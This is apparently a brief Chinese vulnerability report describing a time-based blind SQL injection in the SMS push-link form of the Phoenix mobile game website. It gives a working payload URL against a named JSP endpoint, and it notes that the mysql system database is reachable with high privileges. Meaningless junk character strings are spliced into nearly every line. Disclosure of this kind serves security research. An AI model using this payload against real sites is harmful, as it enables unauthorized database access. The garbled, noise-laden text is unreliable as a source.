简要描述:7 l6 a# t, P7 P0 T( D( l
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。/ ~' v0 X+ O' p
0 X; y, g& @; |
详细说明:' V) Q% v; f9 d# ]
存在SQL盲注url:( v; f" m7 J/ n9 W; }7 d3 W" B
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
6 w* _/ K7 C. Q: ~) uhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
/ Q& T, J* p2 L: L$ Ahttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
& L+ {4 d C( p' D3 q" u) khttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg$ G1 X e2 `, C$ W: p5 ~8 Z
+ `( e6 u6 F+ [/ Z* D能看到mysql系统数据库,看来user权限应该很高的。。 |